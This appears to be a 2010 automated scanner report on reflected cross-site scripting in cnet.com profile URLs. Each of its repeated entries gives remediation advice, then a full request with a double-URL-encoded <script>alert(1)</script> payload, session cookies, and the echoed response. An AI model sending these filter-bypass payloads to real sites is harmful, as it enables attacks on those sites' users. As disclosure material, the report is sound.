<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>mollywooddcadc<script>alert(1)</script>360f87612ee's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eba0c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e369a9b61c84 was submitted in the REST URL parameter 2. This input was echoed as eba0c"><script>alert(1)</script>369a9b61c84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/mollywoodeba0c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e369a9b61c84/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:10:11 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:10:11 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=946 Connection: Keep-Alive Content-Length: 31192
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="mollywoodeba0c"><script>alert(1)</script>369a9b61c84"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a4255%253cscript%253ealert%25281%2529%253c%252fscript%253effa3008c2d9 was submitted in the REST URL parameter 2. This input was echoed as a4255<script>alert(1)</script>ffa3008c2d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/n3td3va4255%253cscript%253ealert%25281%2529%253c%252fscript%253effa3008c2d9/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:51 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:51 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=978 Connection: Keep-Alive Content-Length: 31047
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>n3td3va4255<script>alert(1)</script>ffa3008c2d9's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3c03241a2 was submitted in the REST URL parameter 2. This input was echoed as a9969"><script>alert(1)</script>c3c03241a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/n3td3va9969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3c03241a2/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:48 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:49 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=968 Connection: Keep-Alive Content-Length: 31079
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="n3td3va9969"><script>alert(1)</script>c3c03241a2"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c89ac%253cscript%253ealert%25281%2529%253c%252fscript%253e4d06d86a680 was submitted in the REST URL parameter 2. This input was echoed as c89ac<script>alert(1)</script>4d06d86a680 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/natalidelcontec89ac%253cscript%253ealert%25281%2529%253c%252fscript%253e4d06d86a680/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:57 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:58 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=996 Connection: Keep-Alive Content-Length: 31140
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>natalidelcontec89ac<script>alert(1)</script>4d06d86a680's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18176%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73258364142 was submitted in the REST URL parameter 2. This input was echoed as 18176"><script>alert(1)</script>73258364142 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/natalidelconte18176%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73258364142/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:56 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:56 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=996 Connection: Keep-Alive Content-Length: 31146
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="natalidelconte18176"><script>alert(1)</script>73258364142"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b0b31%253cscript%253ealert%25281%2529%253c%252fscript%253ebdd5d9c2f73 was submitted in the REST URL parameter 2. This input was echoed as b0b31<script>alert(1)</script>bdd5d9c2f73 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/natalieweinsteinb0b31%253cscript%253ealert%25281%2529%253c%252fscript%253ebdd5d9c2f73/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:08:33 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:08:33 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=991 Connection: Keep-Alive Content-Length: 31191
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>natalieweinsteinb0b31<script>alert(1)</script>bdd5d9c2f73's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2516%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5d9e134a7a was submitted in the REST URL parameter 2. This input was echoed as a2516"><script>alert(1)</script>a5d9e134a7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/natalieweinsteina2516%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea5d9e134a7a/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:08:32 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:08:32 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=977 Connection: Keep-Alive Content-Length: 31206
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="natalieweinsteina2516"><script>alert(1)</script>a5d9e134a7a"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 32695%253cscript%253ealert%25281%2529%253c%252fscript%253e78657bddaf3 was submitted in the REST URL parameter 2. This input was echoed as 32695<script>alert(1)</script>78657bddaf3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ngodong32695%253cscript%253ealert%25281%2529%253c%252fscript%253e78657bddaf3/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:31 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:31 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=999 Connection: Keep-Alive Content-Length: 31026
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>ngodong32695<script>alert(1)</script>78657bddaf3's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b999d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54c4c248520 was submitted in the REST URL parameter 2. This input was echoed as b999d"><script>alert(1)</script>54c4c248520 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ngodongb999d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54c4c248520/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:30 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:30 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=980 Connection: Keep-Alive Content-Length: 31087
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="ngodongb999d"><script>alert(1)</script>54c4c248520"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84ba9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee89d8280026 was submitted in the REST URL parameter 2. This input was echoed as 84ba9"><script>alert(1)</script>e89d8280026 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/nofinway84ba9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee89d8280026/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:06:13 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:06:14 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=957 Connection: Keep-Alive Content-Length: 31063
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="nofinway84ba9"><script>alert(1)</script>e89d8280026"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fff91%253cscript%253ealert%25281%2529%253c%252fscript%253e51f330b44a2 was submitted in the REST URL parameter 2. This input was echoed as fff91<script>alert(1)</script>51f330b44a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/nofinwayfff91%253cscript%253ealert%25281%2529%253c%252fscript%253e51f330b44a2/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
